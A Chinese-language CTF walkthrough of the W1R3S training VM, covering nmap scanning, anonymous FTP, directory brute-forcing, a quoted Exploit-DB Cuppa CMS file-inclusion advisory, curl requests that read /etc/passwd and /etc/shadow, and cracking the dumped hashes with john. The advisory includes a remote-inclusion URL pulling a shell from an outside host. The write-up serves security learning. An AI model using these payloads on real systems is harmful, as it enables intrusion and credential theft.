红队笔记_w1r3s

0x01 主机发现

攻击机:192.168.63.128

通过同网段目标发现发现靶机ip

通过nmap进行扫描:

nmap -sn 192.168.63.0/24     这里使用了C类网址的方式进行扫描

红队笔记_w1r3s

目标机网址:192.168.63.132

0x02 nmap扫描

2.1 扫描端口

需要考虑到端口的全和准,这里需要考虑到扫描的速度

nmap --min-rate 10000 -p- 192.168.63.132

--min-rate: 表示扫描的最小速度,需要通过各方面权衡

-p- 表示扫描所有的端口

扫描过程中建议扫描两遍,以此来确定结果是否相同

结果如下:

root@Jripper:~# nmap --min-rate 10000 -p- 192.168.63.132
Starting Nmap 7.91 ( https://nmap.org ) at 2023-01-17 16:42 CST                                                      
Nmap scan report for 192.168.63.132                                                                                  
Host is up (0.00050s latency).                                                                                       
Not shown: 55528 filtered ports, 10003 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
80/tcp   open  http
3306/tcp open  mysql
MAC Address: 00:0C:29:AA:7F:FC (VMware)

Nmap done: 1 IP address (1 host up) scanned in 12.34 seconds

如下我们对具体的端口进行扫描

2.2 扫描服务

a.TCP扫描

nmap -sT -sV -O -p21,22,80,3306 192.168.63.132

-sT 使用TCP进行扫描,更加稳定

-sV 扫描版本信息

-O 扫描操作系统版本

-p 指定端口

结果如下:

root@Jripper:~# nmap -sT -sV -O -p21,22,80,3306 192.168.63.132
Starting Nmap 7.91 ( https://nmap.org ) at 2023-01-17 16:48 CST
Nmap scan report for 192.168.63.132
Host is up (0.00055s latency).

PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 2.0.8 or later
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
3306/tcp open  mysql   MySQL (unauthorized)
MAC Address: 00:0C:29:AA:7F:FC (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5.1
OS details: Linux 3.10 - 4.11, Linux 3.2 - 4.9, Linux 5.1
Network Distance: 1 hop
Service Info: Host: W1R3S.inc; OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.01 seconds

b.UDP扫描

TCP非常可靠,但是有的服务UDP不安全,所以可以使用UDP进行查看是否有的服务开放了不应该有的UDP,同时UDP的扫描较为快速

nmap -sU -p21,22,80,3306 192.168.63.132

结果如下:

root@Jripper:~# nmap -sU -p21,22,80,3306 192.168.63.132
Starting Nmap 7.91 ( https://nmap.org ) at 2023-01-17 16:52 CST
Nmap scan report for 192.168.63.132
Host is up (0.00035s latency).

PORT     STATE         SERVICE
21/udp   open|filtered ftp
22/udp   open|filtered ssh
80/udp   open|filtered http
3306/udp closed        mysql
MAC Address: 00:0C:29:AA:7F:FC (VMware)

Nmap done: 1 IP address (1 host up) scanned in 1.28 seconds

open|filtered表示打开或者过滤,这次扫描意义不大

2.3 漏洞脚本扫描

通过nmap自带的漏洞脚本进行扫描,看看是否有漏洞

nmap --script=vuln -p21,22,80,3306 192.168.63.132

该扫描过程时间较长在该过程中可以进行其他分析

结果如下:

root@Jripper:~# nmap --script=vuln -p21,22,80,3306 192.168.63.132
Starting Nmap 7.91 ( https://nmap.org ) at 2023-01-17 16:56 CST
Nmap scan report for 192.168.63.132
Host is up (0.00032s latency).

PORT     STATE SERVICE
21/tcp   open  ftp
|_sslv2-drown: 
22/tcp   open  ssh
80/tcp   open  http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|_  /wordpress/wp-login.php: Wordpress login page.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
3306/tcp open  mysql
|_mysql-vuln-cve2012-2122: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown: 
MAC Address: 00:0C:29:AA:7F:FC (VMware)

Nmap done: 1 IP address (1 host up) scanned in 169.48 seconds

2.4 分析

21为ftp端口

22为ssh端口 不建议暴力破解,地址可能会被屏蔽,ssh利用概率不大

80为http 漏洞的可能较多,同时可能会有很多信息

3306 mysql 提权等

nmap 漏洞扫描主要是对于80的扫描内容存在漏洞,其中主要是wordpress的部分,这个主要是攻击点,在之后要重点查看。

后面vmware可以发现是虚拟环境,实际攻防过程中需要进行docker逃逸,通常Vmware宿主服务器为windows

由此我们对危害排序:80>21=3306>22

21相对较为简单,所以首先对21进行渗透测试

0x03 FTP渗透

3.1 测试匿名登录

ftp 192.168.63.132

name: anonymous

password:空

如果可以匿名登录,可以查看其中的权限

红队笔记_w1r3s

然后查看目录内容以及对应的权限,然后获取三个文件

ls
mget *.*   用于多个文件下载
get 1.txt

/*对于二进制文件需要如下来保证不会损坏二进制文件,否则为ascii进行下载*/
binary

进行查看后,发现没有可写权限,所以写入的可能不大

3.2 查看文件

  • 01.txt

New FTP Server For W1R3S.inc

此处是leetspeak

  • 02.txt

01ec2d8fc11c493b25029fb1f47f39ce

SXQgaXMgZWFzeSwgYnV0IG5vdCB0aGF0IGVhc3kuLg==

此处为加密方式,通过如下命令可以识别:

hash-identifier '01ec2d8fc11c493b25029fb1f47f39ce'

结果如下:

Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))

可以通过md5尝试解密

This is not a password

下面为base64,使用命令

echo 'SXQgaXMgZWFzeSwgYnV0IG5vdCB0aGF0IGVhc3kuLg==' | base64 -d

-d表示解密

结果如下:

root@Jripper:~# echo 'SXQgaXMgZWFzeSwgYnV0IG5vdCB0aGF0IGVhc3kuLg==' | base64 -d
It is easy, but not that easy..root@Jripper:~# 
  • 03.txt

. _ _ .__
_ /| |_ _ / / / _ _ / _/ |__| __
| | | | _/ // / | || / _( < _ | |/ _/
| | | Y _/ / | || | / / | | | _
|____| |___| /_ > _/ / |___||____| /____ /_______ / / |__|___| /___ >

            \/     \/         \/                \/       \/        \/  \/         \/     \/ 
  • worktodo.txt

ı pou,ʇ ʇɥıuʞ ʇɥıs ıs ʇɥǝ ʍɐʎ ʇo ɹooʇ¡

....punoɹɐ ƃuıʎɐןd doʇs ‘op oʇ ʞɹoʍ ɟo ʇoן ɐ ǝʌɐɥ ǝʍ

第一行

上下镜像

I don't think this is the way to root

第二行

上下翻转

We have a lot of work to do, please stop playing around

  • employee-names.txt

The W1R3S.inc employee list

Naomi.W - Manager
Hector.A - IT Dept
Joseph.G - Web Design
Albert.O - Web Design
Gina.L - Inventory
Rico.D - Human Resources

这里后面可能可以用到,在后面的构造字典的时候或者路径等可能会有相关的内容。同时IT部门,Web Design代表了每个人的作用,可以用于社工

0x04 web目录爆破

红队笔记_w1r3s

网站内容打开如上方所示,页面为Apache服务器页面,部分个人网站可能在该位置留下目录,但是可利用性不大。

在刚才漏扫的过程中,发下有wordpress系统,所以我们猜想在某个目录中存在wordpress目录,所以进行目录爆破得到不同的目录。

4.1 gobuster

4.2 dirb

dirb http://192.168.63.132 /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 

/usr/share/wordlists/ 该路径用于保存kali下的字典位置

结果如下:

root@Jripper:/usr/share/wordlists/dirbuster# dirb http://192.168.63.132 /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt 

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Tue Jan 17 19:03:18 2023
URL_BASE: http://192.168.63.132/
WORDLIST_FILES: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt

-----------------

^C* Generating Wordlist...
root@Jripper:/usr/share/wordlists/dirbuster# dirb http://192.168.63.132 /usr/share/wordlists/dirb/small.txt 
-----------------                                                                                                    
DIRB v2.22                                                                                                           
By The Dark Raver                                                                                                    
-----------------                                                                                                    
                                                                                                                     
START_TIME: Tue Jan 17 19:05:01 2023                                                                                 
URL_BASE: http://192.168.63.132/                                                                                     
WORDLIST_FILES: /usr/share/wordlists/dirb/small.txt                                                                  
                                                                                                                     
-----------------                                                                                                    
                                                                                                                     
GENERATED WORDS: 959                                                                                                 
                                                                                                                     
---- Scanning URL: http://192.168.63.132/ ----                                                                       
==> DIRECTORY: http://192.168.63.132/administrator/                                                                  
==> DIRECTORY: http://192.168.63.132/javascript/                                                                     
==> DIRECTORY: http://192.168.63.132/wordpress/                                                                     
                                                                                                                    
---- Entering directory: http://192.168.63.132/administrator/ ----
==> DIRECTORY: http://192.168.63.132/administrator/api/                                                             
==> DIRECTORY: http://192.168.63.132/administrator/classes/                                                         
==> DIRECTORY: http://192.168.63.132/administrator/installation/                                                    
==> DIRECTORY: http://192.168.63.132/administrator/js/                                                              
==> DIRECTORY: http://192.168.63.132/administrator/templates/                                                       
                                                                                                                    
---- Entering directory: http://192.168.63.132/javascript/ ----
                                                                                                                    
---- Entering directory: http://192.168.63.132/wordpress/ ----
                                                                                                                    
---- Entering directory: http://192.168.63.132/administrator/api/ ----
==> DIRECTORY: http://192.168.63.132/administrator/api/administrator/                                               
==> DIRECTORY: http://192.168.63.132/administrator/api/test/                                                        
                                                                                                                    
---- Entering directory: http://192.168.63.132/administrator/classes/ ----
                                                                                                                    
---- Entering directory: http://192.168.63.132/administrator/installation/ ----
==> DIRECTORY: http://192.168.63.132/administrator/installation/html/                                               
                                                                                                                    
---- Entering directory: http://192.168.63.132/administrator/js/ ----
                                                                                                                    
---- Entering directory: http://192.168.63.132/administrator/templates/ ----
==> DIRECTORY: http://192.168.63.132/administrator/templates/default/                                               
                                                                                                                    
---- Entering directory: http://192.168.63.132/administrator/api/administrator/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                    
---- Entering directory: http://192.168.63.132/administrator/api/test/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                    
---- Entering directory: http://192.168.63.132/administrator/installation/html/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                    
---- Entering directory: http://192.168.63.132/administrator/templates/default/ ----
==> DIRECTORY: http://192.168.63.132/administrator/templates/default/classes/                                       
==> DIRECTORY: http://192.168.63.132/administrator/templates/default/css/                                           
==> DIRECTORY: http://192.168.63.132/administrator/templates/default/html/                                          
==> DIRECTORY: http://192.168.63.132/administrator/templates/default/images/                                        
                                                                                                                    
---- Entering directory: http://192.168.63.132/administrator/templates/default/classes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                    
---- Entering directory: http://192.168.63.132/administrator/templates/default/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                    
---- Entering directory: http://192.168.63.132/administrator/templates/default/html/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                    
---- Entering directory: http://192.168.63.132/administrator/templates/default/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
-----------------
END_TIME: Tue Jan 17 19:05:07 2023
DOWNLOADED: 9590 - FOUND: 0

4.3 feroxbuster

feroxbuster

4.4 结果分析

0x05 本地文件包含利用

5.1 searchsploit

对于 http://192.168.63.132/administrator/installation/

可以查看到如下信息:

红队笔记_w1r3s

红队笔记_w1r3s

红队笔记_w1r3s

如图中的database拼写错误,这个在后续的源码分析部分可能在网上搜索的过程中找到独特的源码

下方的默认密码为admin

于是我们在该位置进行install一下,password为root

红队笔记_w1r3s

发生了错误,寻找其他思路,用户名错误,实际渗透中可以反复尝试,可以尝试注入漏洞。

但是暴露了cuppa CMS的系统

searchsploit cuppa cms

结果如下:

红队笔记_w1r3s

下载利用文件:

searchsploit cuppa cms -m 25971
root@Jripper:~/baji/w1r3s# cat 25971.txt 
# Exploit Title   : Cuppa CMS File Inclusion
# Date            : 4 June 2013
# Exploit Author  : CWH Underground
# Site            : www.2600.in.th
# Vendor Homepage : http://www.cuppacms.com/
# Software Link   : http://jaist.dl.sourceforge.net/project/cuppacms/cuppa_cms.zip
# Version         : Beta
# Tested on       : Window and Linux

  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O .. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /
  / XXXXXX /
 (________(
  `------'

####################################
VULNERABILITY: PHP CODE INJECTION
####################################

/alerts/alertConfigField.php (LINE: 22)

-----------------------------------------------------------------------------
LINE 22:
        <?php include($_REQUEST["urlConfig"]); ?>
-----------------------------------------------------------------------------


#####################################################
DESCRIPTION
#####################################################

An attacker might include local or remote PHP files or read non-PHP files with this vulnerability. User tainted data is used when creating the file name that will be included into the current file. PHP code in this file will be evaluated, non-PHP code will be embedded to the output. This vulnerability can lead to full server compromise.

http://target/cuppa/alerts/alertConfigField.php?urlConfig=[FI]

#####################################################
EXPLOIT
#####################################################

http://target/cuppa/alerts/alertConfigField.php?urlConfig=http://www.shell.com/shell.txt?
http://target/cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd

Moreover, We could access Configuration.php source code via PHPStream

For Example:
-----------------------------------------------------------------------------
http://target/cuppa/alerts/alertConfigField.php?urlConfig=php://filter/convert.base64-encode/resource=../Configuration.php
-----------------------------------------------------------------------------

Base64 Encode Output:
-----------------------------------------------------------------------------
PD9waHAgCgljbGFzcyBDb25maWd1cmF0aW9uewoJCXB1YmxpYyAkaG9zdCA9ICJsb2NhbGhvc3QiOwoJCXB1YmxpYyAkZGIgPSAiY3VwcGEiOwoJCXB1YmxpYyAkdXNlciA9ICJyb290IjsKCQlwdWJsaWMgJHBhc3N3b3JkID0gIkRiQGRtaW4iOwoJCXB1YmxpYyAkdGFibGVfcHJlZml4ID0gImN1XyI7CgkJcHVibGljICRhZG1pbmlzdHJhdG9yX3RlbXBsYXRlID0gImRlZmF1bHQiOwoJCXB1YmxpYyAkbGlzdF9saW1pdCA9IDI1OwoJCXB1YmxpYyAkdG9rZW4gPSAiT0JxSVBxbEZXZjNYIjsKCQlwdWJsaWMgJGFsbG93ZWRfZXh0ZW5zaW9ucyA9ICIqLmJtcDsgKi5jc3Y7ICouZG9jOyAqLmdpZjsgKi5pY287ICouanBnOyAqLmpwZWc7ICoub2RnOyAqLm9kcDsgKi5vZHM7ICoub2R0OyAqLnBkZjsgKi5wbmc7ICoucHB0OyAqLnN3ZjsgKi50eHQ7ICoueGNmOyAqLnhsczsgKi5kb2N4OyAqLnhsc3giOwoJCXB1YmxpYyAkdXBsb2FkX2RlZmF1bHRfcGF0aCA9ICJtZWRpYS91cGxvYWRzRmlsZXMiOwoJCXB1YmxpYyAkbWF4aW11bV9maWxlX3NpemUgPSAiNTI0Mjg4MCI7CgkJcHVibGljICRzZWN1cmVfbG9naW4gPSAwOwoJCXB1YmxpYyAkc2VjdXJlX2xvZ2luX3ZhbHVlID0gIiI7CgkJcHVibGljICRzZWN1cmVfbG9naW5fcmVkaXJlY3QgPSAiIjsKCX0gCj8+
-----------------------------------------------------------------------------

Base64 Decode Output:
-----------------------------------------------------------------------------
<?php
        class Configuration{
                public $host = "localhost";
                public $db = "cuppa";
                public $user = "root";
                public $password = "Db@dmin";
                public $table_prefix = "cu_";
                public $administrator_template = "default";
                public $list_limit = 25;
                public $token = "OBqIPqlFWf3X";
                public $allowed_extensions = "*.bmp; *.csv; *.doc; *.gif; *.ico; *.jpg; *.jpeg; *.odg; *.odp; *.ods; *.odt; *.pdf; *.png; *.ppt; *.swf; *.txt; *.xcf; *.xls; *.docx; *.xlsx";
                public $upload_default_path = "media/uploadsFiles";
                public $maximum_file_size = "5242880";
                public $secure_login = 0;
                public $secure_login_value = "";
                public $secure_login_redirect = "";
        }
?>
-----------------------------------------------------------------------------

Able to read sensitive information via File Inclusion (PHP Stream)

################################################################################################################
 Greetz      : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2
################################################################################################################

5.2 文件包含漏洞

上述文件可以发现存在一个文件包含漏洞,时间为2013年所以无法判断是否现在的系统存在该漏洞,需要测试

利用如下测试:

http://target/cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd

红队笔记_w1r3s

路径不存在,所以我们继续尝试其他路径

http://192.168.63.132/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd

红队笔记_w1r3s

说明读取了某些文件,但是没有完全显示可能原因:

  • 该方式无效
  • 某些编码细节

我们继续尝试

我们尝试用curl工具继续执行

在漏洞描述中,有:

http://target/cuppa/alerts/alertConfigField.php?urlConfig=php://filter/convert.base64-encode/resource=../Configuration.php

说明编码需要调整

curl --data-urlencode urlConfig=../../../../../../../../../etc/passwd http://192.168.63.132/administrator/alerts/alertConfigField.php

结果得到如下html代码:

<style>
    .new_content{
        position: fixed;
    }
    .alert_config_field{
        font-size:12px;
        background:#FFF;
        position:relative;
        border-radius: 3px;
        box-shadow: 0px 0px 5px rgba(0,0,0,0.2);
        overflow:hidden;
        position:fixed;
        top:50%;
        left:50%;
        width:600px;
        height:440px;
        margin-left:-300px;
        margin-top:-220px;
    }
    .alert_config_top{
        position: relative;
        margin: 2px;
        margin-bottom: 0px;
        border: 1px solid #D2D2D2;
        background: #4489F8;
        overflow: auto;
        color:#FFF;
        font-size: 13px;
        padding: 7px 5px;
        box-shadow: 0 0 2px rgba(0, 0, 0, 0.1);
        text-shadow: 0 1px 1px rgba(0, 0, 0, 0.2);
    }
    .description_alert{
        position:relative;
        font-size:12px;
        text-shadow:0 1px #FFFFFF;
        font-weight: normal;
        padding: 5px 0px 5px 0px;
    }
    .btnClose_alert{
        position:absolute;
        top: 4px; right: 2px;
        width:22px;
        height:22px;
        cursor:pointer;
        background:url(js/cuppa/cuppa_images/close_white.png) no-repeat;
        background-position: center;
        background-size: 13px;
    }
    .content_alert_config{
        position:relative;
        clear:both;
        margin: 2px;
        margin-top: 0px;
        height: 401px;
        padding: 10px;
        overflow: auto;
    }
</style>
<script>
        function CloseDefaultAlert(){
                cuppa.setContent({'load':false, duration:0.2});
        cuppa.blockade({'load':false, duration:0.2, delay:0.1});
        }
</script>
<div class="alert_config_field" id="alert">
    <div class="alert_config_top">
        <strong>Configuration</strong>:         <div class="btnClose_alert" id="btnClose_alert" onclick="CloseDefaultAlert()"></div>
    </div>
    <div id="content_alert_config" class="content_alert_config">
        root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false
whoopsie:x:109:117::/nonexistent:/bin/false
avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false
colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:118:126:RealtimeKit,,,:/proc:/bin/false
saned:x:119:127::/var/lib/saned:/bin/false
usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
w1r3s:x:1000:1000:w1r3s,,,:/home/w1r3s:/bin/bash
sshd:x:121:65534::/var/run/sshd:/usr/sbin/nologin
ftp:x:122:129:ftp daemon,,,:/srv/ftp:/bin/false
mysql:x:123:130:MySQL Server,,,:/nonexistent:/bin/false
    </div>
</div>r

利用html2text得到文本显示:

curl --data-urlencode urlConfig=../../../../../../../../../etc/passwd http://192.168.63.132/administrator/alerts/alertConfigField.php | html2text
 % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  4414  100  4347  100    67   530k   8375 --:--:-- --:--:-- --:--:--  538k
Configuration:
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:
x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/
usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/
var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/
nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/
var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:
/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System
(admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/
nonexistent:/usr/sbin/nologin systemd-timesync:x:100:102:systemd Time
Synchronization,,,:/run/systemd:/bin/false systemd-network:x:101:103:systemd
Network Management,,,:/run/systemd/netif:/bin/false systemd-resolve:x:102:104:
systemd Resolver,,,:/run/systemd/resolve:/bin/false systemd-bus-proxy:x:103:
105:systemd Bus Proxy,,,:/run/systemd:/bin/false syslog:x:104:108::/home/
syslog:/bin/false _apt:x:105:65534::/nonexistent:/bin/false messagebus:x:106:
110::/var/run/dbus:/bin/false uuidd:x:107:111::/run/uuidd:/bin/false lightdm:x:
108:114:Light Display Manager:/var/lib/lightdm:/bin/false whoopsie:x:109:117::/
nonexistent:/bin/false avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/
avahi-autoipd:/bin/false avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-
daemon:/bin/false dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false
colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/
bin/false hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false pulse:x:117:
124:PulseAudio daemon,,,:/var/run/pulse:/bin/false rtkit:x:118:126:
RealtimeKit,,,:/proc:/bin/false saned:x:119:127::/var/lib/saned:/bin/false
usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false w1r3s:x:1000:1000:
w1r3s,,,:/home/w1r3s:/bin/bash sshd:x:121:65534::/var/run/sshd:/usr/sbin/
nologin ftp:x:122:129:ftp daemon,,,:/srv/ftp:/bin/false mysql:x:123:130:MySQL
Server,,,:/nonexistent:/bin/false

这里我们尝试是否可以获取shadow文件,该文件保存了账号密码等信息

结果成功:

<style>
    .new_content{
        position: fixed;
    }
    .alert_config_field{
        font-size:12px;
        background:#FFF;
        position:relative;
        border-radius: 3px;
        box-shadow: 0px 0px 5px rgba(0,0,0,0.2);
        overflow:hidden;
        position:fixed;
        top:50%;
        left:50%;
        width:600px;
        height:440px;
        margin-left:-300px;
        margin-top:-220px;
    }
    .alert_config_top{
        position: relative;
        margin: 2px;
        margin-bottom: 0px;
        border: 1px solid #D2D2D2;
        background: #4489F8;
        overflow: auto;
        color:#FFF;
        font-size: 13px;
        padding: 7px 5px;
        box-shadow: 0 0 2px rgba(0, 0, 0, 0.1);
        text-shadow: 0 1px 1px rgba(0, 0, 0, 0.2);
    }
    .description_alert{
        position:relative;
        font-size:12px;
        text-shadow:0 1px #FFFFFF;
        font-weight: normal;
        padding: 5px 0px 5px 0px;
    }
    .btnClose_alert{
        position:absolute;
        top: 4px; right: 2px;
        width:22px;
        height:22px;
        cursor:pointer;
        background:url(js/cuppa/cuppa_images/close_white.png) no-repeat;
        background-position: center;
        background-size: 13px;
    }
    .content_alert_config{
        position:relative;
        clear:both;
        margin: 2px;
        margin-top: 0px;
        height: 401px;
        padding: 10px;
        overflow: auto;
    }
</style>
<script>
        function CloseDefaultAlert(){
                cuppa.setContent({'load':false, duration:0.2});
        cuppa.blockade({'load':false, duration:0.2, delay:0.1});
        }
</script>
<div class="alert_config_field" id="alert">
    <div class="alert_config_top">
        <strong>Configuration</strong>:         <div class="btnClose_alert" id="btnClose_alert" onclick="CloseDefaultAlert()"></div>
    </div>
    <div id="content_alert_config" class="content_alert_config">
        root:$6$vYcecPCy$JNbK.hr7HU72ifLxmjpIP9kTcx./ak2MM3lBs.Ouiu0mENav72TfQIs8h1jPm2rwRFqd87HDC0pi7gn9t7VgZ0:17554:0:99999:7:::
daemon:*:17379:0:99999:7:::
bin:*:17379:0:99999:7:::
sys:*:17379:0:99999:7:::
sync:*:17379:0:99999:7:::
games:*:17379:0:99999:7:::
man:*:17379:0:99999:7:::
lp:*:17379:0:99999:7:::
mail:*:17379:0:99999:7:::
news:*:17379:0:99999:7:::
uucp:*:17379:0:99999:7:::
proxy:*:17379:0:99999:7:::
www-data:$6$8JMxE7l0$yQ16jM..ZsFxpoGue8/0LBUnTas23zaOqg2Da47vmykGTANfutzM8MuFidtb0..Zk.TUKDoDAVRCoXiZAH.Ud1:17560:0:99999:7:::
backup:*:17379:0:99999:7:::
list:*:17379:0:99999:7:::
irc:*:17379:0:99999:7:::
gnats:*:17379:0:99999:7:::
nobody:*:17379:0:99999:7:::
systemd-timesync:*:17379:0:99999:7:::
systemd-network:*:17379:0:99999:7:::
systemd-resolve:*:17379:0:99999:7:::
systemd-bus-proxy:*:17379:0:99999:7:::
syslog:*:17379:0:99999:7:::
_apt:*:17379:0:99999:7:::
messagebus:*:17379:0:99999:7:::
uuidd:*:17379:0:99999:7:::
lightdm:*:17379:0:99999:7:::
whoopsie:*:17379:0:99999:7:::
avahi-autoipd:*:17379:0:99999:7:::
avahi:*:17379:0:99999:7:::
dnsmasq:*:17379:0:99999:7:::
colord:*:17379:0:99999:7:::
speech-dispatcher:!:17379:0:99999:7:::
hplip:*:17379:0:99999:7:::
kernoops:*:17379:0:99999:7:::
pulse:*:17379:0:99999:7:::
rtkit:*:17379:0:99999:7:::
saned:*:17379:0:99999:7:::
usbmux:*:17379:0:99999:7:::
w1r3s:$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.:17567:0:99999:7:::
sshd:*:17554:0:99999:7:::
ftp:*:17554:0:99999:7:::
mysql:!:17554:0:99999:7:::
    </div>
</div>

然后我们破解对应的hash文件

www-data:$6$8JMxE7l0$yQ16jM..ZsFxpoGue8/0LBUnTas23zaOqg2Da47vmykGTANfutzM8MuFidtb0..Zk.TUKDoDAVRCoXiZAH.Ud1:17560:0:99999:7:::
w1r3s:$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.:17567:0:99999:7:::

0x06 John破解

john hash

hash 为文件名,默认有一个字典

结果如下:

Warning: detected hash type "sha512crypt", but the string is also recognized as "HMAC-SHA256"
Use the "--format=HMAC-SHA256" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
www-data (www-data)
